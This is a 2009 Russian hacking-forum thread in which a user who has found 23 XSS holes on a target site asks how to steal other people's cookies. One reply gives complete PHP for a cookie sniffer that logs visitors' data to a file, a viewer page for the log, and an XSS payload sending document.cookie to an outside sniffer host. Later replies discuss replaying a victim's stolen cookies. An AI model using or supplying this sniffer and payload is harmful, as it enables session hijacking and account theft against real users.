Куки

Discussion in 'Песочница' started by Badak, 12 Jul 2009.

  1. Badak

    Badak Member

    Joined:
    6 Jul 2009
    Messages:
    28
    Likes Received:
    20
    Reputations:
    -5
    Все доброго времени суток.Ребята,подскажите как мне чужие куки забирать.Заранее спасибо
     
  2. Badak

    Badak Member

    Joined:
    6 Jul 2009
    Messages:
    28
    Likes Received:
    20
    Reputations:
    -5
    Я нашел XSS,что дальше?:Р
     
  3. Inotsee

    Inotsee New Member

    Joined:
    24 Jun 2009
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Издеваешься? Знаешь как найти XSS и не знаешь как запрос составить? Составь запрос, дай жертве ссылку и лови его куки на сниффере.
     
  4. Badak

    Badak Member

    Joined:
    6 Jul 2009
    Messages:
    28
    Likes Received:
    20
    Reputations:
    -5
    Я не издеваюсь))Я знаю как XSS найти уже на нужном сайте нашел 23,а как запрос составить и что дальше делать понятия не имею,но хочу научиться
     
  5. br3k

    br3k Elder - Старейшина

    Joined:
    19 Sep 2007
    Messages:
    130
    Likes Received:
    107
    Reputations:
    17
    XSS
    _ttp://hackzona.ru/hz.php?name=News&file=article&sid=5005
    _ttp://www.cgisecurity.com/articles/dx27.html
    _ttp://ha.ckers.org/xss.html
    _ttp:/thread20140.html
    _ttp:/thread8038.html
    _ttp:/thread7124-XSS+FAQ.html
    К изучению.
     
  6. Aikaram

    Aikaram Elder - Старейшина

    Joined:
    8 Jun 2009
    Messages:
    146
    Likes Received:
    256
    Reputations:
    42
    иди лучше книжки почитай, которые на лето задали. а то все куки да куки.
     
  7. Badak

    Badak Member

    Joined:
    6 Jul 2009
    Messages:
    28
    Likes Received:
    20
    Reputations:
    -5
    Тебе выдали ты иди и читай
     
  8. Badak

    Badak Member

    Joined:
    6 Jul 2009
    Messages:
    28
    Likes Received:
    20
    Reputations:
    -5
    Может мне кто-то ответить?!Что делать после того как нашел XSS?
     
  9. Flegmatique

    Flegmatique Banned

    Joined:
    6 Jul 2009
    Messages:
    7
    Likes Received:
    9
    Reputations:
    0
    ссылки тебе дали, читай и действуй
    жевать за тебя никто не будет
     
  10. Failure

    Failure Elder - Старейшина

    Joined:
    21 Sep 2008
    Messages:
    179
    Likes Received:
    46
    Reputations:
    16
    sniff.php
    PHP:
    <?php
    $ip
    =$_SERVER["REMOTE_ADDR"];
    $ref=$_SERVER["HTTP_REFERER"];
    $ua=$_SERVER["HTTP_USER_AGENT"];
    $q=$_SERVER["QUERY_STRING"];
    if(
    $ref == "") {
    $str "<b>$ip</b>  | Нет HTTP реферера | <br>Юзает: $ua |<br>QUERY_STRING: $q |<br>======================================================================================================";
    }
    else {
    $str "<b>$ip</b>  | Пришел с :  <a href=$ref>$ref</a> | <br>Юзает: $ua |<br>QUERY_STRING:   $q   |<br>======================================================================================================";}

    $file=fopen("log.txt","a+");
    fwrite($file,"$str<br>");
    fclose($file);
    ?>
    <img src="http://img1.liveinternet.ru/images/attach/b/3/28/251/28251827_novoe.jpg">
    log.php:
    PHP:
    <?php
    echo "<html>
    <body>
    <meta http-equiv; charset=windows-1251>
    <title>WEB Sniffer</title>
    <body bgcolor=black style=color:red>
    <h1>WEB SNIFFER</h1>
    <input type=submit value='Обновить' onClick=javascript:window.location='log.php'>
    </form>
    <br><br><br>
    ======================================================================================================<br>"
    ;
    if(
    file_exists("log.txt"))
    require 
    "log.txt";
    echo 
    "<br></body></html>";
    ?>
    http://site.ru/folder/[XSS]="><script>window.location='http://sniff.ru/sniff.php?'+document.cookie;</script>
     
  11. G4bR1eL

    G4bR1eL Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    70
    Likes Received:
    3
    Reputations:
    0
    Почему некоторыми куками нельзя воспользоваться? Например форум - подставил куки жертвы, выкидывает в Гости...
     
  12. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    835
    Reputations:
    605
    из за привязки к IP может быть
     
    _________________________
  13. G4bR1eL

    G4bR1eL Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    70
    Likes Received:
    3
    Reputations:
    0
    по ходу она и есть. А бага с базой никакого не может быть?)
     
  14. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    835
    Reputations:
    605
    я так понял ты про IPB форум ведеш речь...нет нету
     
    _________________________